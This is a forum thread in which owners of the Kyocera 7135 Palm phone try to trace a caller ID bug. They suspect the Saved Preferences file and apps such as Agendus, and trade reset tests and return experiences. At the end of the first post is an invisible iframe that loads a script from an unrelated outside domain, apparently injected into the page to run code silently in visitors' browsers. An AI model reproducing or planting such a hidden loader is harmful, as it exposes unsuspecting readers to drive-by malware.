+ Reply to Thread

Interesting new caller ID bug info...

Ok....i'm not sure what all this means, but i just want to throw it out there to see if something sticks with all u techies

something has been very wrong with my phone for the last 2 weeks. it started when i backed up my palm to the sd card using backupbuddy VFS (free), then reset. i got the caller ID bug, then my AIM prc kept crashing my phone, then i uninstalled the AIM prc, and all the world was ok again. my phone never really felt the "same" but i lived with it. it seemed slow, sluggish, and had that dam caller ID bug. well today, with way too much time on my hands, i set out to find out what's going on....and i think i could have stumbled upon something.

first, i renamed my existing backup folder as a reference point....i then deleted the psyslaunch and saved prefs files in my backup folder, did a hard reset, sync'ed and had no more caller ID bug. i tried a few times.........every call was perfect. then, just to test things out, i did a hard reset, un-renamed (?) my old backup folder and sync'd (ie, my phone now has the old folder, old settings, etc....) i get the caller ID bug.

ok....so i go back to the "clean" backup---the one with the "new" psyslaunch and saved prefs....the one that had the no caller ID bug, and i call my phone just to be certain and everything is fine. my number shows up correctly. then, i start tapping away at apps......first i hit agendus....it asks me if i want to give the hard keys access to the agendus app, etc etc.... i say no (this is what i usually did). then i tap at contacts pro, and it asks if i want to use the address book key to toggle between the contacts pro app and the address book...i say yes (this is what i usually did)
    i call my phone......i get the bug. this (in theory) narrows the issue down to agendus and contacts pro i think.....

so then i try reinstalling the "clean" backup again. call my phone, caller ID works like a charm. then i tap on agendus and answer their little question as i always have. i get out of the app, i call my phone and have the bug. this, potentially, narrows it down to agendus.

is it possible that a preference in agendus (or either one of those apps for that matter--i'm still not convinced it's an isolated incident) is tripping up the phone's ability to search caller ID? I'm curious to know if the people that have the "bug" also have agendus and/or contacts pro installed, and have messed with the preferences (ie, answered those questions that pop up) and i'd like to know if the people who DON'T have the bug don't have either app on their phone.

are we getting closer here? can anyone else replicate this? Hope it helps!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I recall that the people who had the caller ID bug reported that it did not work the first time they got a call from someone, but that on subsequent calls from the same number, the caller ID worked fine. Your experience seems to contradict that, assuming that you were calling from the same number each time you called. Of course my recollection of the specifics of the caller ID bug may be totally wrong.

Unfortunately I have neither of those programs installed and have the Caller ID issue.

I am about 30 days into my phone and have the Caller ID issue about once a day. Very sporadic. One call won't show ID, another call 2 minutes later will. For what it's worth, I am in Chicago.

Just a theory.. Maybe its something with the Saved prefs file... As if when programs edit this file, they don't save it properly or it doesnt get modified correctly.

When you delete the saved prefs file and it works... that would support this theory because it grabs the copy of the "good" Saved Prefs from the ROM. Then when something messes with it. (either a system pref) or a program pref... all heck breaks out.

Try somehting to see if we can narrow this down to the saved prefs file:

Get back to the Clean... WORKING Caller ID setup and instead of syncing your stuff, just sync or beam FILEZ & Agendus on the device.

Test the phone before running it to make sure the sync/beam of files didnt mess up the CID.

Now run FILEZ.. dont do anything but stare at the list of files for now and then exit app.. just b/c I'm parianoid test the CID.

hopefully its still works fine and Files hasnt in any way corrupted the system. NOW open FileZ and Find the Saved Prefs file-- click on details, attributes and set the READ-ONLY attribute.

TEST CID AGAIN.

OK so now run agendus and answer the questions like you did before....hopefully It won't be able to save those preferences dut to the READ-Only bit set on the SP file.

TEST CID ... does it still work? If yes then we pretty much have narrowed the problem to the Saved Prefs file.. if so that sucks cause everything uses that file and keeping it read-only will make things either crash or just not save thier prefs.
    iPhone therefore iAm.

Re: Interesting new caller ID bug info...

Originally posted by sh9854
    Ok....i'm not sure what all this means, but i just want to throw it out there to see if something sticks with all u techies

(GREAT POST SNIPPED)

are we getting closer here? can anyone else replicate this? Hope it helps!!
    I have been having simiar problems that all started at once -- contrast problems, caller ID bug, and lockups with inverted screens all the time. Problem is so bad that phone is going back to Kyocera today.

However, one thing about your post made sense to me. Everytime my phone locks up, it is usually right when I press one of the hard keys -- as in an application that has registered to be notified when these are pressed is causing the lockup problem.

I will try removing the SavedPreferences and LunchDB and let you know if that helps. I think you are on to something here -- and even though my phone is going back, all these problems seem like a software problem to me...

Glenn

i only get the problem in nyc. i sent my phone back to kyo, they sent me a new one, and the new still has caller id problem, but does not strike quite as often as with original phone. i think its software that has to do with vz, b/c it only happens in nyc.

Originally posted by eschw999
    i only get the problem in nyc. i sent my phone back to kyo, they sent me a new one,
    Did you deal with Kyo or with GetConnected? Also, did you have to send your 7135 back before they sent you a new one?

Kyocera will crossship to you first before you return, with a credit card and an authorization for $700 that will turn into a full fledged charge on your account if you do not return the phone within 5 days. I'm on my third phone.

FWIW, I get the Caller ID bug with all of the phones I've had. (It's not why I'm returning these phones, I have other issues). For whatever reason the 7135 gets "confused" at times, for instance you will click around on the phone or palm side and nothing will happen for a few seconds. I think this is along the same lines as what is happening to the caller id. I think it's completely random and not based on anything external.

Originally posted by bones boy
    (It's not why I'm returning these phones, I have other issues). For whatever reason the 7135 gets "confused" at times, for instance you will click around on the phone or palm side and nothing will happen for a few seconds. I think this is along the same lines as what is happening to the caller id. I think it's completely random and not based on anything external.
    I think this might be a "feature" with all 7135's. I certainly can get ahead going from app to app and then to the phone and before long it has no idea where it's at. There appears to be a considerable lag time during some movements and the phone does need to catch us. Especially even when keying in numbers from the key pad.